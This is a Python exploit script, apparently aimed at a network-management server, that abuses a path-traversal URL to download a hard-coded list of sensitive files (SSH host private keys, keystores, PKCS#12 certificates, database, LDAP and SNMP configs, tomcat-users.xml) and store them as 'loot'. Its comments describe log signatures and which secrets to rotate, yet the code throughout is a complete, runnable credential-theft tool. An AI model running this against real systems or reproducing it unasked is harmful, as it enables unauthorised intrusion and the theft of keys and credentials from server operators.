exploit.py
import os
import argparse
import urllib.error
from urllib.request import urlopen
from random import randint
def save_to_file(data, dest_file):
    """Write the bytes in *data* to *dest_file*, replacing any existing file.

    Args:
        data: Bytes-like payload to store.
        dest_file: Path of the file to create or truncate.
    """
    # Binary mode keeps the payload byte-for-byte; nothing is decoded or
    # newline-translated on the way to disk.
    with open(dest_file, "wb") as sink:
        sink.write(data)
def exploit(host, port, target_file, ssl=False):
    """Request one file through the traversal URI and return the response body.

    The request path is the fixed prefix
    ``/cachestart/<1-6>/cacheend/apiclient/fluidicv2/javascript/jquery/``
    followed by four ``../`` segments and *target_file*. That literal shape
    (the prefix plus ``../`` sequences) is the string to search for in
    web-server and proxy logs when checking whether a host received such
    requests.

    Args:
        host: Hostname or IP address placed in the URL authority.
        port: Port number; coerced with ``int()``, so a non-numeric value
            raises ``ValueError`` before any request is sent.
        target_file: Path appended verbatim after the ``../`` segments.
        ssl: True selects ``https``, False selects ``http``.

    Returns:
        The raw response body as bytes.

    Raises:
        Whatever ``urlopen`` raises (for example ``urllib.error.HTTPError``)
        is propagated unchanged to the caller.
    """
    # The numeric segment is chosen at random per request, so a log signature
    # should match any value 1-6 rather than one fixed number.
    cache_slot = randint(1, 6)
    request_path = (
        f"/cachestart/{cache_slot}/cacheend/apiclient"
        f"/fluidicv2/javascript/jquery/../../../../{target_file}"
    )
    port = str(int(port))

    # Equality (not identity) comparison is kept from the original, so 1 and 0
    # behave like True and False. Any other value leaves the scheme unset and
    # the lookup below fails with UnboundLocalError.
    if ssl == True:
        scheme, implicit_port = "https", "443"
    elif ssl == False:
        scheme, implicit_port = "http", "80"

    # The scheme's default port is omitted from the URL; any other port is
    # written out explicitly.
    authority = host if port == implicit_port else f"{host}:{port}"
    return urlopen(f"{scheme}://{authority}{request_path}").read()
def main():
    """Parse the command line, request each listed path, and store the replies.

    Options: ``-t`` target host (required), ``-p`` port (default 8060),
    ``-d`` output directory prefix (default ``./``), ``-s`` SSL flag.

    Behaviour worth knowing when reading traffic or output from this script:

    * ``args.arg_ssl`` is parsed but not forwarded; every request is made
      with ``ssl=False``, i.e. over plain HTTP.
    * Only ``urllib.error.HTTPError`` is handled per file; any other
      exception from the request ends the run.
    * The output name is ``loot_dir`` concatenated with the requested path
      ('/' replaced by '|'), so a ``loot_dir`` without a trailing separator
      becomes a filename prefix rather than a directory.

    Judging by their names, the requested paths are SSH host keys,
    keystores/truststores, PKCS#12 bundles and database/LDAP/SNMP
    configuration. For a host whose logs show these requests answered
    successfully, that list is the inventory of material to treat as
    disclosed and rotate.
    """
    cli = argparse.ArgumentParser()
    cli.add_argument("-t", action="store", dest="target",
                     default=None, help="Target IP or hostname to exploit")
    cli.add_argument("-p", action="store", dest="port",
                     type=int, default=8060, help="Remote port of the target")
    cli.add_argument("-d", action="store", dest="loot_dir",
                     default="./", help="Directory to store loot")
    cli.add_argument("-s", action="store_true", dest="arg_ssl",
                     default=False, help="Target uses SSL")
    args = cli.parse_args()

    if args.target is None:
        print("Error: You must specify the target host with the '-t' flag")
        # os._exit terminates the process immediately, without running
        # cleanup handlers.
        os._exit(1)

    # Paths are relative to the directory reached by the four "../" segments
    # in the request URI.
    target_files = [
        "bin/.ssh_host_dsa_key",
        "bin/.ssh_host_dsa_key.pub",
        "bin/.ssh_host_rsa_key",
        "bin/.ssh_host_rsa_key.pub",
        "conf/client.keystore",
        "conf/customer-config.xml",
        "conf/database_params.conf",
        "conf/FirewallAnalyzer/aaa_auth-conf.xml",
        "conf/FirewallAnalyzer/auth-conf_ppm.xml",
        "conf/gateway.conf",
        "conf/itom.truststore",
        "conf/netflow/auth-conf.xml",
        "conf/netflow/server.xml",
        "conf/netflow/ssl_server.xml",
        "conf/NFAEE/cs_server.xml",
        "conf/OpManager/database_params.conf",
        "conf/OpManager/database_params_DE.conf",
        "conf/OpManager/ldap.conf",
        "conf/OpManager/MicrosoftSQL/database_params.conf",
        "conf/OpManager/POSTGRESQL/database_params.conf",
        "conf/OpManager/POSTGRESQL/database_params_DE.conf",
        "conf/OpManager/securitydbData.xml",
        "conf/OpManager/SnmpDefaultProperties.xml",
        "conf/Oputils/snmp/Community.xml",
        "conf/Persistence/DBconfig.xml",
        "conf/Persistence/persistence-configurations.xml",
        "conf/pmp/PMP_API.conf",
        "conf/pmp/pmp_server_cert.p12",
        "conf/product-config.xml",
        "conf/SANSeed.xml",
        "conf/server.keystore",
        "conf/server.xml",
        "conf/system_properties.conf",
        "conf/tomcat-users.xml",
        "lib/OPM_APNS_Cert.p12"
    ]

    for rel_path in target_files:
        try:
            body = exploit(args.target, args.port, rel_path, ssl=False)
        except urllib.error.HTTPError as http_err:
            # An HTTP error status for one path is reported and skipped.
            print(f"[-] {rel_path} - {http_err!s}")
            continue

        # Flatten the remote path into a single local filename.
        flat_name = rel_path.replace("/", "|").strip()
        dest = args.loot_dir + flat_name
        save_to_file(body, dest)
        print(f"[+] {rel_path} saved to {dest}")
# Run the command-line entry point only when executed as a script, not when
# the module is imported.
if __name__ == "__main__":
    main()